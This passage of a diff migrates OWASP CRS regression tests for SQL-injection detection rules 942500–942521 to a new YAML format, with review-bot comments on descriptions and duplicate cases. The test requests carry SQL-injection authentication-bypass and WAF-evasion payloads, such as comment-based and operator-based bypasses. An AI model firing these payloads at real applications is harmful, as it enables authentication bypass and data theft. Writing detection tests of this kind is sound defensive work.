uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log: + expect_ids: [942500] + - test_id: 4 desc: "Use of optimizer hints (/*+...*/) as evasion technique with space before +" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 
- uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log: + expect_ids: [942500] + - test_id: 5 desc: "Status Page Test - MySQL inline comment detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" - version: HTTP/1.0 - output: - log_contains: id "942500" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index ddf211cc7..622884924 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml 
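Review bot: Test 5's `desc: "Status Page Test - MySQL inline comment detected"` does not describe its payload, unlike tests 1–4; it differs from test 1 by using a non-version `/*!comment*/` comment, so something like `desc: "Portability comment with non-numeric body (/*!comment*/) as evasion technique"` would make a failure self-explanatory. Tests 3 and 4 also send `version: "HTTP/1.1"` while every other stage in the file uses `HTTP/1.0`; if the 1.1 variant is intentional it deserves a short comment, otherwise aligning on `HTTP/1.0` keeps the request shape uniform across the file.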
@@ -1,39 +1,37 @@ --- meta: author: "Franziska Buehler, azurit" - description: None - enabled: true - name: 942510.yaml +rule_id: 942510 tests: - - test_title: 942510-1 + - test_id: 1 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - log_contains: id "942510" - - test_title: 942510-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + log: + expect_ids: [942510] + - test_id: 2 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - no_log_contains: id "942510" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942510] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index 9cf2ca3cb..a2096ccbe 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml 
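Review bot: Test 2 is a negative test (`uri: "/get?'bla'"` with `no_expect_ids: [942510]`) but keeps the same `desc: "SQLi bypass detected: backticks"` as the positive test 1, so a failure reads as the rule missing a bypass when it actually means a false positive on plain single quotes. The 942520 tests later in this diff use a `Negative test: ...` prefix for exactly this case; suggest `desc: "Negative test: single quotes alone must not trigger 942510"` for test 2.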
@@ -1,39 +1,37 @@ --- meta: author: "Walter Hop, azurit" - description: None - enabled: true - name: 942511.yaml +rule_id: 942511 tests: - - test_title: 942511-1 + - test_id: 1 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - no_log_contains: id "942511" - - test_title: 942511-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942511] + - test_id: 2 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - log_contains: id "942511" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + log: + expect_ids: [942511] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml index 79f614b6a..be7dd030a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml 
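Review bot: Test 1 is the negative case here (`uri: "/get?`bla`"` with `no_expect_ids: [942511]`) yet is described as `"SQLi bypass detected: quotes"`, the same wording as the positive test 2, so the report for a false positive on backticks would look like a missed detection. Following the `Negative test: ...` convention used by 942520 in this same change, suggest `desc: "Negative test: backticks alone must not trigger 942511"` for test 1.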
@@ -2,409 +2,408 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.0/4" - enabled: true - name: 942520.yaml +rule_id: 942520 tests: - - test_title: 942520-1 + - test_id: 1 desc: "Detects basic SQL auth bypass with 'is not something'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'is%20not-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'is%20not-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 2 desc: "Negative test: 'is notes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'is%20notes" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'is%20notes" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 3 desc: "Detects basic SQL auth bypass with 'not like something'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20like%20id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20like%20id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 4 desc: "Detects basic SQL auth bypass with 'not glob'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20glob-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 5 desc: "Detects basic SQL auth bypass with 'not like glob'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20glob-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 6 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'|email-- - data: "var=x'%7Cemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'|email-- + data: "var=x'%7Cemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 7 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'-email-- - data: "var=x'-email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'-email-- + data: "var=x'-email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 8 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'+email-- (there seem to be a bug with double encoding in tests) - data: "var=x'%252Bemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'+email-- (there seem to be a bug with double encoding in tests) + data: "var=x'%252Bemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 9 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'^email-- - data: "var=x'%5Eemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'^email-- + data: "var=x'%5Eemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 10 desc: "Nagive test: Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 
x'@email-- - data: "var=x'%40email--" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'@email-- + data: "var=x'%40email--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 11 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'&email-- - data: "var=x'%26email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'&email-- + data: "var=x'%26email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 12 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'email-- - data: "var=x'%3Eemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + 
port: 80 + uri: "/post" + # x'>email-- + data: "var=x'%3Eemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 14 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'=email-- - data: "var=x'%3Demail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'=email-- + data: "var=x'%3Demail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 15 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'/email-- - data: "var=x'%2Femail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'/email-- + data: "var=x'%2Femail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 16 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'%email-- - data: "var=x'%25email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'%email-- + data: "var=x'%25email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 17 desc: "Negative test: Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'~email-- - data: "var=x'~email--" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'~email-- + data: "var=x'~email--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 18 desc: "Detects basic SQL auth bypass with mod" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=x'%20mod%20id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=x'%20mod%20id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 19 desc: "Detects basic SQL auth bypass with: sounds like" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='sounds%20like%20rowid--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='sounds%20like%20rowid--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 20 desc: "Bypass with a comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='%2F**%2F*2--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='%2F**%2F*2--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 21 desc: "Integration test: 942521 blocks foo'or'oof" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS 
test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo'or'oof" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942520-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo'or'oof" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 22 desc: "Integration test: 942522 blocks foo\\''or'oof" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo%5c''or'oof" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942520-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo%5c''or'oof" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 23 desc: "Detect auth bypass email=' is not?--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=%27%20is%20not%3F--" - version: HTTP/1.0 - output: - log_contains: id "942520" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=%27%20is%20not%3F--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml index 4a119284b..29eec3976 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml 
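Review bot: `test_id: 4` and `test_id: 5` in 942520.yaml send the identical payload `var=id'not%20glob-id--`, so test 5, described as `Detects basic SQL auth bypass with 'not like glob'`, never exercises the variant its `desc` names; either give it a payload that actually contains that phrase or remove the duplicate. The ids also jump from `test_id: 12` to `test_id: 14`; since the migration replaces free-form `test_title` values with numeric ids, a short comment noting that test 13 was intentionally dropped (or renumbering) would avoid the appearance of a missing case. `test_id: 8` still relies on the double-encoded `%252B` with the comment `# x'+email-- (there seem to be a bug with double encoding in tests)`; that workaround should be re-verified against the test runner this change targets, because as written the request may not test the literal `+` operator the description claims. Minor: `desc: "Nagive test: ..."` on `test_id: 10` should read `Negative test`.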
@@ -2,410 +2,409 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.1/4" - enabled: true - name: 942521.yaml +rule_id: 942521 tests: - - test_title: 942521-1 + - test_id: 1 desc: "Detects the most basic authentication bypass with 'or'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a'or'a" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a'or'a" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 2 desc: "Detects basic SQLite authentication bypass with 'or?'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a'or?--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a'or?--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 3 desc: "False-positive: Detects or-based authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=is%20this%20your%20parents'%20or%20yours?" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=is%20this%20your%20parents'%20or%20yours?" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 4 desc: "Detects basic SQL auth bypass and-based" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'and%20id%20is%20not?--" - version: HTTP/1.0 - output: - log_contains: id 